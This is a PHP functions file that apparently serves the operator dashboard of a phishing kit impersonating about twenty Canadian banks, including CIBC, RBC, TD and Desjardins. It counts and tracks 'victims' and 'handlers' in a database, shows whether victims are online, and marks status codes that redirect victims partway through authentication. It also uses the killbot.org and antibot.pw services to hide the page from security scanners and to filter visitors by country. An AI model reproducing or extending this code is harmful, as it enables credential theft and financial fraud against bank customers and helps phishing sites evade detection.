<?php

include 'config.php';

$conn = mysqli_connect($servername, $username, $password, $database);
if (!$conn) {
	//die("Connection failed: " . mysqli_connect_error());
}


if (!function_exists('mysqli_fetch_all')) {
    function mysqli_fetch_all(mysqli_result $result) {
        $data = [];
        while ($data[] = $result->fetch_assoc()) {}
        return $data;
    }
}



function status_to_badge($stscode, $path){
    $json = json_decode(file_get_contents($path), true);
    $sts = $json[$stscode];
    if($sts != ''){
        if(strpos($sts, "On-") !== false){
            return "<code style='color:aqua;'><b>$sts</b></code>";
        }elseif(strpos($sts, "After-") !== false){
            return "<code style='color:#E95451;'><b>$sts</b></code>";
        }elseif(strpos($sts, "Finished") !== false){
            return "<code style='color:green;'><b>$sts</b></code>";
        }elseif(strpos($sts, "Banned") !== false){
            return "<code style='color:orange;'><b>$sts</b></code>";
        }
    }
}

function get_next_birthday_age($birthday) {
    $year = explode("/", $birthday);
    $nextb = $year[0] . "-" . $year[1] . "-" . ($year[2]-1);
    $dob = date("d-m-Y",strtotime($nextb));
    $dobObject = new DateTime($dob);
    $nowObject = new DateTime();
    $diff = $dobObject->diff($nowObject);
    return $diff->y;
}

function redirects_btn($stscode, $path){
    $json = json_decode(file_get_contents($path), true);
    $sts = $json[$stscode];
    if($sts != ''){
        if((strpos($sts, "After-") !== false) or (strpos($sts, "On-Auth") !== false)){
            return '1';
        }else{
            return '0';
        }
    }
}


function check_online($lastseen){
    $now = strtotime("-9 seconds");
    if($lastseen < $now){
        return "<code style='color:red;'><b>offline</b></code>";
    }else{
        return "<code style='color:limegreen;'><b>online</b></code>";
    }
}

function total_victims($sqlcon){
    $query = mysqli_query($sqlcon, "SELECT * from victims");
    return mysqli_num_rows($query);
}


function total_visits($sqlcon){
    $query = mysqli_query($sqlcon, "SELECT * from visits");
    return mysqli_num_rows($query);
}

function online_victims($sqlcon){
    $count = 0;
    $query = mysqli_query($sqlcon, "SELECT * from victims");
    if($query){
        if(mysqli_num_rows($query) >= 1){
            $array = array_filter(mysqli_fetch_all($query,MYSQLI_ASSOC));
        }
    }

    foreach($array as $value){
        $now = strtotime("-9 seconds");
        if($value['lastseen'] > $now){
            $count++;
        }
    }
    
    return $count;
}


function online_handlers($sqlcon){
    $count = 0;
    $query = mysqli_query($sqlcon, "SELECT * from handlers");
    if($query){
        if(mysqli_num_rows($query) >= 1){
            $array = array_filter(mysqli_fetch_all($query,MYSQLI_ASSOC));
        }
    }

    foreach($array as $value){
        $now = strtotime("-9 seconds");
        if($value['lastseen'] > $now){
            $count++;
        }
    }
    
    return $count;
}


function useragent_to_browser($ua){
    if(strpos($ua, 'MSIE') !== FALSE) $browser = 'internet-explorer'; elseif(strpos($ua, 'Trident') !== FALSE) $browser = 'internet-explorer'; elseif(strpos($ua, 'Firefox') !== FALSE) $browser = 'firefox'; elseif(strpos($ua, 'Chrome') !== FALSE) $browser = 'chrome'; elseif(strpos($ua, 'Opera Mini') !== FALSE) $browser = "opera"; elseif(strpos($ua, 'Opera') !== FALSE) $browser = "Opera"; elseif(strpos($ua, 'Safari') !== FALSE) $browser = "safari"; else $browser = 'question-circle';
    return "<i class='fa fa-$browser fa-lg'></i>";
}

function iname_to_bank($iname) {
    $itype = "";
    switch ($iname) {
        case "i1":
            $itype = "CIBC";
            break;
        case "i2":
            $itype = "Scotiabank";
            break;
        case "i3":
            $itype = "RBC";
            break;
        case "i4":
            $itype = "Simplii";
            break;
        case "i5":
            $itype = "TD";
            break;
        case "i6":
            $itype = "BMO";
            break;
        case "i7":
            $itype = "National Bank";
            break;
        case "i8":
            $itype = "ATB";
            break;
        case "i9":
            $itype = "PC Financial";
            break;
        case "i10":
            $itype = "MotusBank";
            break;
        case "i11":
            $itype = "CoastCapital";
            break;
        case "i12":
            $itype = "Manulife";
            break;
        case "i13":
            $itype = "Tangerine";
            break;
        case "i14":
            $itype = "Peoples Trust";
            break;
        case "i15":
            $itype = "Laurentian";
            break;
        case "i16":
            $itype = "Desjardins";
            break;
        case "i17":
            $itype = "Meridian";
            break;
        case "i18":
            $itype = "Conexus";
            break;
        case "i19":
            $itype = "Servus";
            break;
        case "i20":
            $itype = "Vancity";
            break;
        default:
            $itype = $iname;
            break;
    }
    return $itype;
}


function iname_to_ilogo($iname, $cfg_url) {
    $ilogo = "";
    switch ($iname) {
        case "i1":
            $ilogo = "<img class='ilogos' src='../$cfg_url/theme/i1.svg' alt='CIBC' title='CIBC'>";
            break;
        case "i2":
            $ilogo = "<img class='ilogos' src='../$cfg_url/theme/i2.svg' alt='Scotiabank' title='Scotiabank'>";
            break;
        case "i3":
            $ilogo = "<img class='ilogos' src='../$cfg_url/theme/i3.svg' alt='RBC' title='RBC'>";
            break;
        case "i4":
            $ilogo = "<img class='ilogos' src='../$cfg_url/theme/i4.svg' alt='Simplii' title='Simplii'>";
            break;
        case "i5":
            $ilogo = "<img class='ilogos' src='../$cfg_url/theme/i5.svg' alt='TD Bank' title='TD Bank'>";
            break;
        case "i6":
            $ilogo = "<img class='ilogos' src='../$cfg_url/theme/i6.svg' alt='BMO' title='BMO'>";
            break;
        case "i7":
            $ilogo = "<img class='ilogos' src='../$cfg_url/theme/i7.svg' alt='National Bank' title='National Bank'>";
            break;
        case "i8":
            $ilogo = "<img class='ilogos' src='../$cfg_url/theme/i8.svg' alt='ATB Financial' title='ATB Financial'>";
            break;
        case "i9":
            $ilogo = "<img class='ilogos' src='../$cfg_url/theme/i9.svg' alt='PC Financial' title='PC Financial'>";
            break;
        case "i10":
            $ilogo = "<img class='ilogos' src='../$cfg_url/theme/i10.svg' alt='MotusBank' title='MotusBank'>";
            break;
        case "i11":
            $ilogo = "<img class='ilogos' src='../$cfg_url/theme/i11.svg' alt='CoastCapital' title='CoastCapital'>";
            break;
        case "i12":
            $ilogo = "<img class='ilogos' src='../$cfg_url/theme/i12.svg' alt='Manulife' title='Manulife'>";
            break;
        case "i13":
            $ilogo = "<img class='ilogos' src='../$cfg_url/theme/i13.svg' alt='Tangerine' title='Tangerine'>";
            break;
        case "i14":
            $ilogo = "<img class='ilogos' src='../$cfg_url/theme/i14.svg' alt='Peoples Trust' title='Peoples Trust'>";
            break;
        case "i15":
            $ilogo = "<img class='ilogos' src='../$cfg_url/theme/i15.svg' alt='Laurentian' title='Laurentian'>";
            break;
        case "i16":
            $ilogo = "<img class='ilogos' src='../$cfg_url/theme/i16.svg' alt='Desjardins' title='Desjardins'>";
            break;
        case "i17":
            $ilogo = "<img class='ilogos' src='../$cfg_url/theme/i17.svg' alt='Meridian' title='Meridian'>";
            break;
        case "i18":
            $ilogo = "<img class='ilogos' src='../$cfg_url/theme/i18.svg' alt='Conexus' title='Conexus'>";
            break;
        case "i19":
            $ilogo = "<img class='ilogos' src='../$cfg_url/theme/i19.png' alt='Servus' title='Servus'>";
            break;
        case "i20":
            $ilogo = "<img class='ilogos' src='../$cfg_url/theme/i20.png' alt='Vancity' title='Vancity'>";
            break;
        default:
            // $ilogo = "<img class='ilogos' src='../$cfg_url/theme/unknown.svg' alt='Unknown' title='Unknown'>";
            $ilogo = $iname;
            break;
    }
    return $ilogo;
}


function code_to_country($code){

    $code = strtoupper($code);

    $countryList = array(
        'AF' => 'Afghanistan',
        'AX' => 'Aland Islands',
        'AL' => 'Albania',
        'DZ' => 'Algeria',
        'AS' => 'American Samoa',
        'AD' => 'Andorra',
        'AO' => 'Angola',
        'AI' => 'Anguilla',
        'AQ' => 'Antarctica',
        'AG' => 'Antigua and Barbuda',
        'AR' => 'Argentina',
        'AM' => 'Armenia',
        'AW' => 'Aruba',
        'AU' => 'Australia',
        'AT' => 'Austria',
        'AZ' => 'Azerbaijan',
        'BS' => 'Bahamas the',
        'BH' => 'Bahrain',
        'BD' => 'Bangladesh',
        'BB' => 'Barbados',
        'BY' => 'Belarus',
        'BE' => 'Belgium',
        'BZ' => 'Belize',
        'BJ' => 'Benin',
        'BM' => 'Bermuda',
        'BT' => 'Bhutan',
        'BO' => 'Bolivia',
        'BA' => 'Bosnia and Herzegovina',
        'BW' => 'Botswana',
        'BV' => 'Bouvet Island (Bouvetoya)',
        'BR' => 'Brazil',
        'IO' => 'British Indian Ocean Territory (Chagos Archipelago)',
        'VG' => 'British Virgin Islands',
        'BN' => 'Brunei Darussalam',
        'BG' => 'Bulgaria',
        'BF' => 'Burkina Faso',
        'BI' => 'Burundi',
        'KH' => 'Cambodia',
        'CM' => 'Cameroon',
        'CA' => 'Canada',
        'CV' => 'Cape Verde',
        'KY' => 'Cayman Islands',
        'CF' => 'Central African Republic',
        'TD' => 'Chad',
        'CL' => 'Chile',
        'CN' => 'China',
        'CX' => 'Christmas Island',
        'CC' => 'Cocos (Keeling) Islands',
        'CO' => 'Colombia',
        'KM' => 'Comoros the',
        'CD' => 'Congo',
        'CG' => 'Congo the',
        'CK' => 'Cook Islands',
        'CR' => 'Costa Rica',
        'CI' => 'Cote d\'Ivoire',
        'HR' => 'Croatia',
        'CU' => 'Cuba',
        'CY' => 'Cyprus',
        'CZ' => 'Czech Republic',
        'DK' => 'Denmark',
        'DJ' => 'Djibouti',
        'DM' => 'Dominica',
        'DO' => 'Dominican Republic',
        'EC' => 'Ecuador',
        'EG' => 'Egypt',
        'SV' => 'El Salvador',
        'GQ' => 'Equatorial Guinea',
        'ER' => 'Eritrea',
        'EE' => 'Estonia',
        'ET' => 'Ethiopia',
        'FO' => 'Faroe Islands',
        'FK' => 'Falkland Islands (Malvinas)',
        'FJ' => 'Fiji the Fiji Islands',
        'FI' => 'Finland',
        'FR' => 'France, French Republic',
        'GF' => 'French Guiana',
        'PF' => 'French Polynesia',
        'TF' => 'French Southern Territories',
        'GA' => 'Gabon',
        'GM' => 'Gambia the',
        'GE' => 'Georgia',
        'DE' => 'Germany',
        'GH' => 'Ghana',
        'GI' => 'Gibraltar',
        'GR' => 'Greece',
        'GL' => 'Greenland',
        'GD' => 'Grenada',
        'GP' => 'Guadeloupe',
        'GU' => 'Guam',
        'GT' => 'Guatemala',
        'GG' => 'Guernsey',
        'GN' => 'Guinea',
        'GW' => 'Guinea-Bissau',
        'GY' => 'Guyana',
        'HT' => 'Haiti',
        'HM' => 'Heard Island and McDonald Islands',
        'VA' => 'Holy See (Vatican City State)',
        'HN' => 'Honduras',
        'HK' => 'Hong Kong',
        'HU' => 'Hungary',
        'IS' => 'Iceland',
        'IN' => 'India',
        'ID' => 'Indonesia',
        'IR' => 'Iran',
        'IQ' => 'Iraq',
        'IE' => 'Ireland',
        'IM' => 'Isle of Man',
        'IL' => 'Israel',
        'IT' => 'Italy',
        'JM' => 'Jamaica',
        'JP' => 'Japan',
        'JE' => 'Jersey',
        'JO' => 'Jordan',
        'KZ' => 'Kazakhstan',
        'KE' => 'Kenya',
        'KI' => 'Kiribati',
        'KP' => 'Korea',
        'KR' => 'Korea',
        'KW' => 'Kuwait',
        'KG' => 'Kyrgyz Republic',
        'LA' => 'Lao',
        'LV' => 'Latvia',
        'LB' => 'Lebanon',
        'LS' => 'Lesotho',
        'LR' => 'Liberia',
        'LY' => 'Libyan Arab Jamahiriya',
        'LI' => 'Liechtenstein',
        'LT' => 'Lithuania',
        'LU' => 'Luxembourg',
        'MO' => 'Macao',
        'MK' => 'Macedonia',
        'MG' => 'Madagascar',
        'MW' => 'Malawi',
        'MY' => 'Malaysia',
        'MV' => 'Maldives',
        'ML' => 'Mali',
        'MT' => 'Malta',
        'MH' => 'Marshall Islands',
        'MQ' => 'Martinique',
        'MR' => 'Mauritania',
        'MU' => 'Mauritius',
        'YT' => 'Mayotte',
        'MX' => 'Mexico',
        'FM' => 'Micronesia',
        'MD' => 'Moldova',
        'MC' => 'Monaco',
        'MN' => 'Mongolia',
        'ME' => 'Montenegro',
        'MS' => 'Montserrat',
        'MA' => 'Morocco',
        'MZ' => 'Mozambique',
        'MM' => 'Myanmar',
        'NA' => 'Namibia',
        'NR' => 'Nauru',
        'NP' => 'Nepal',
        'AN' => 'Netherlands Antilles',
        'NL' => 'Netherlands the',
        'NC' => 'New Caledonia',
        'NZ' => 'New Zealand',
        'NI' => 'Nicaragua',
        'NE' => 'Niger',
        'NG' => 'Nigeria',
        'NU' => 'Niue',
        'NF' => 'Norfolk Island',
        'MP' => 'Northern Mariana Islands',
        'NO' => 'Norway',
        'OM' => 'Oman',
        'PK' => 'Pakistan',
        'PW' => 'Palau',
        'PS' => 'Palestinian Territory',
        'PA' => 'Panama',
        'PG' => 'Papua New Guinea',
        'PY' => 'Paraguay',
        'PE' => 'Peru',
        'PH' => 'Philippines',
        'PN' => 'Pitcairn Islands',
        'PL' => 'Poland',
        'PT' => 'Portugal, Portuguese Republic',
        'PR' => 'Puerto Rico',
        'QA' => 'Qatar',
        'RE' => 'Reunion',
        'RO' => 'Romania',
        'RU' => 'Russian Federation',
        'RW' => 'Rwanda',
        'BL' => 'Saint Barthelemy',
        'SH' => 'Saint Helena',
        'KN' => 'Saint Kitts and Nevis',
        'LC' => 'Saint Lucia',
        'MF' => 'Saint Martin',
        'PM' => 'Saint Pierre and Miquelon',
        'VC' => 'Saint Vincent and the Grenadines',
        'WS' => 'Samoa',
        'SM' => 'San Marino',
        'ST' => 'Sao Tome and Principe',
        'SA' => 'Saudi Arabia',
        'SN' => 'Senegal',
        'RS' => 'Serbia',
        'SC' => 'Seychelles',
        'SL' => 'Sierra Leone',
        'SG' => 'Singapore',
        'SK' => 'Slovakia (Slovak Republic)',
        'SI' => 'Slovenia',
        'SB' => 'Solomon Islands',
        'SO' => 'Somalia, Somali Republic',
        'ZA' => 'South Africa',
        'GS' => 'South Georgia and the South Sandwich Islands',
        'ES' => 'Spain',
        'LK' => 'Sri Lanka',
        'SD' => 'Sudan',
        'SR' => 'Suriname',
        'SJ' => 'Svalbard & Jan Mayen Islands',
        'SZ' => 'Swaziland',
        'SE' => 'Sweden',
        'CH' => 'Switzerland, Swiss Confederation',
        'SY' => 'Syria',
        'TW' => 'Taiwan',
        'TJ' => 'Tajikistan',
        'TZ' => 'Tanzania',
        'TH' => 'Thailand',
        'TL' => 'Timor-Leste',
        'TG' => 'Togo',
        'TK' => 'Tokelau',
        'TO' => 'Tonga',
        'TT' => 'Trinidad and Tobago',
        'TN' => 'Tunisia',
        'TR' => 'Turkey',
        'TM' => 'Turkmenistan',
        'TC' => 'Turks and Caicos Islands',
        'TV' => 'Tuvalu',
        'UG' => 'Uganda',
        'UA' => 'Ukraine',
        'AE' => 'United Arab Emirates',
        'GB' => 'United Kingdom',
        'US' => 'United States of America',
        'UM' => 'United States Minor Outlying Islands',
        'VI' => 'United States Virgin Islands',
        'UY' => 'Uruguay, Eastern Republic of',
        'UZ' => 'Uzbekistan',
        'VU' => 'Vanuatu',
        'VE' => 'Venezuela',
        'VN' => 'Vietnam',
        'WF' => 'Wallis and Futuna',
        'EH' => 'Western Sahara',
        'YE' => 'Yemen',
        'ZM' => 'Zambia',
        'ZW' => 'Zimbabwe'
    );

    if( !$countryList[$code] ) return $code;
    else return $countryList[$code];
    }



function file_get_contents_curl2($url) {
    $ch = curl_init();

    curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);       

    $data = curl_exec($ch);
    curl_close($ch);

    return $data;
}

function getrealUserIP(){
    if (isset($_SERVER["HTTP_CF_CONNECTING_IP"])) {
        $_SERVER['HTTP_X_REAL_IP'] = $_SERVER["HTTP_CF_CONNECTING_IP"];
        $_SERVER['HTTP_CLIENT_IP'] = $_SERVER["HTTP_CF_CONNECTING_IP"];
    }
    $client  = @$_SERVER['HTTP_CLIENT_IP'];
    $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
    $remote  = $_SERVER['REMOTE_ADDR'];
    if(filter_var($client, FILTER_VALIDATE_IP)){
        $ip = $client;
    }
    elseif(filter_var($forward, FILTER_VALIDATE_IP)){
        $ip = $forward;
    }
    else{
        $ip = $remote;
    }
    return $ip;
}

function checkkillbot($apikey) {
    $ip         = getrealUserIP();
    $respons    = file_get_contents_curl2("https://killbot.org/api/v2/blocker?ip=".$ip."&apikey=$apikey&ua=".urlencode($_SERVER['HTTP_USER_AGENT'])."&url=".urldecode($_SERVER['REQUEST_URI']));
    $json       = json_decode($respons,true);
    if($json['meta']['code'] == 200) {
        if($json['data']['block_access'] == true) {
            // blocked
            return true;
        } else {
            return false;
        }
    } else {
        if(!empty($json['meta']['message'])) {
            return false;
        } else {
            return false;
        }
    }
}
function onlyuk(){
	$ip = getrealUserIP();
	$req = json_decode(file_get_contents_curl2("https://antibot.pw/api/ip?ip=$ip"),true);
	if($req['countryCode'] == 'GB'){
		return true;
	}else{
		return false;
	}
}
function checkBot($apikey){
	$ip = getrealUserIP();
	$url 		= "https://antibot.pw/api/v2-blockers?ip=$ip&apikey=$apikey&ua=".urlencode($_SERVER['HTTP_USER_AGENT']);
	$respons 	= file_get_contents_curl2($url);
	return json_decode($respons,true)['is_bot'];
}

function generateRandomString($length = 10) {
    $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $randomString = '';
    for ($i = 0; $i < $length; $i++) {
        $randomString .= $characters[rand(0, strlen($characters) - 1)];
    }
    return $randomString;
}

?>